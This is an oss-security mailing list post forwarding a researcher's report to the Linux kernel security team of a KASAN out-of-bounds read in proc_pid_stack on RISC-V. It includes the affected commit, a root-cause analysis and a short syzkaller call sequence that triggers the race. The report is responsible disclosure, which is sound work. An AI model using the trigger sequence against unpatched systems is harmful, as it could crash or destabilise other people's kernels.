Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <13a4b070.14de8.199d2085ff4.Coremail.xujiakai24@mails.ucas.ac.cn>
Date: Sat, 11 Oct 2025 14:49:48 +0800 (GMT+08:00)
From: 许佳凯 <xujiakai24@...ls.ucas.ac.cn>
To: oss-security@...ts.openwall.com
Subject: Linux kernel: KASAN: out-of-bounds Read in proc_pid_stack on RISC-V




-----原始邮件-----
发件人:许佳凯 <xujiakai24@...ls.ucas.ac.cn>
发送时间:2025-10-11 14:48:52 (星期六)
收件人: security@...nel.org
抄送: paul.walmsley@...ive.com, palmer@...belt.com, aou@...s.berkeley.edu, syzkaller@...glegroups.com, linux-riscv@...ts.infradead.org
主题: [BUG REPORT] KASAN: out-of-bounds Read in proc_pid_stack on RISC-V

Dear Linux Kernel Security Team and Maintainers,
We would like to report a security vulnerability in the Linux kernel, identified as a KASAN out-of-bounds read, which we discovered through fuzz testing.

1. Affected Version
The bug was successfully reproduced on the upstream Linux kernel version 6.16, specifically at commit 038d61fd642278bab63ee8ef722c50d10ab01e8f.


2. Build Configuration
The kernel was built with the accompanying configuration file (see attachment: .config), which includes the necessary KASAN options to detect this issue.


3. Proof of Concept and Reproduction
We have provided a reliable C reproducer program (repro.cprog attached) to trigger this bug. Additional diagnostic information, including full kernel logs and system context, can be found in the attached files log0, report0, and machineInfo0.
The vulnerability is triggered by the following sequence of system calls:
r0 = syz_open_procfs(0x0, &(0x7f0000000000)='stack\x00');
read(r0, &(0x7f0000000040)=""/5, 0x5); // (async)
setsockopt$MRT_INIT(r0, 0x0, 0xc8, 0x0, 0x0);


4. Root Cause Analysis
The core issue is a race condition that corrupts kernel state. The bug occurs when one thread initiates a kernel stack walk by reading the /proc/self/stackfile, while a second thread concurrently issues a setsockopt() system call with the MRT_INIT command on the same file descriptor. This setsockopt operation is invalid for a proc filesystem file descriptor and inadvertently corrupts internal kernel data structures associated with it. This corruption causes the first thread's subsequent stack frame traversal (walk_stackframe) to compute an invalid memory address, resulting in an out-of-bounds read that is caught by KASAN.


Thank you for your attention to this matter.

Content of type "text/html" skipped

Download attachment "machineInfo0" of type "application/octet-stream" (1141 bytes)

Download attachment "report0" of type "application/octet-stream" (3319 bytes)

Download attachment "repro.cprog" of type "application/octet-stream" (26831 bytes)

Download attachment "log0" of type "application/octet-stream" (98061 bytes)

Download attachment ".config" of type "application/xml" (224634 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.